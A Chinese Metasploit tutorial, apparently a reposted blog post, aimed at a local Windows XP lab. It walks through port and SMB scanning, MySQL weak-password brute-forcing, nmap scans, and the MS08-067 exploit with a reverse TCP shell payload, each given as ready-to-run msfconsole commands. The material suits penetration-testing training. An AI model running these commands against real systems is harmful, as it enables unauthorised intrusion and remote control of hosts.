Msfconsole工具 概括:
Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.
目录:
免责声明:
严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
测试机:
kali2021 链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg
提取码:tian
靶场:
本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win XP(IP地址:192.168.1.103)
Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客
Msfconsole的使用:
打开Msfconsole工具:
msfconsole

第一步:进行端口扫描.
(1)查看端口扫描的模块:
search portscan

(2)使用端口扫描模块:
use auxiliary/scanner/portscan/tcp

(3)查看模块信息(模块里的yes都要填):
show options

(4)设置目标IP进行扫描:
set rhosts (目标IP地址)

(5)设置线程为100:
set threads 100

(6)使用(执行):run 或者 exploit
run

(7)退出到msf :
back

第二步:进行服务的扫描.
(1)查看smb_version服务模块:
search smb_version

(2)使用服务模块:
use auxiliary/scanner/smb/smb_version

(3)查看模块信息(模块里的yes都要填):
show options

(4)设置目标IP进行扫描:
set rhosts (目标IP地址)

(5)设置线程为10:
set threads 10

(6)使用(执行):run或者exploit
run

(7)退出到msf :
back

第三步:扫描3306(Mysql)端口的弱口令
(1)查看扫描3306(Mysql)端口的弱口令模板信息:
search mysql_login

(2)使用扫描3306(Mysql)端口的弱口令模块:
use auxiliary/scanner/mysql/mysql_login

(3)查看模块信息(模块里的yes都要填):
show options

(4)设置目标IP进行扫描:
set rhosts (目标IP地址)

(5)设置线程为10:
set threads 10

(6)使用(执行):run或者exploit
run

(7)退出到msf :
back

第四步:在msf模块里也可以使用nmap进行扫描.
(1)主机发现:
nmap -sn 地址/24

(2)端口扫描:
nmap -sS 地址

(3)系统扫描:
nmap -O 地址

(4)版本扫描:
nmap -sV 地址

(5)综合扫描:
nmap -A 地址

第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.
(1)启动 postgresql 数据库:
systemctl start postgresql.service

(2)设置为开机自启:
systemctl enable postgresql

(3)启动 Metasploit
msfconsole

(4)搜索Win XP漏洞对应的模块.
search ms08_067

(5)使用Win XP漏洞扫描模块.
use exploit/windows/smb/ms08_067_netapi

(6)设置攻击载荷
set payload generic/shell_reverse_tcp

(7)查看模块信息(模块里的yes都要填).
show options

(8)查看渗透攻击模块的攻击平台,找到操作系统平台版本
show targets

(9)设置操作系统(target).
set target 34

(10)设置目标IP.
set rhosts (目标IP地址)

(11)设置本地IP
set LHOST 本地IP

(12)设置端口:
set LPORT 4444

(13)使用(执行):run或者exploit

**(14)渗透测试成功. **
渗透测试失败的原因:
(1)靶机开启了防火墙.
(2)两台主机不能互联.(用 ping IP地址)
参考链接:使用MSF 利用 ms08_067 对 XP 进行渗透_丰梓林的博客-CSDN博客
版权归原作者 半个西瓜. 所有, 如有侵权,请联系我们删除。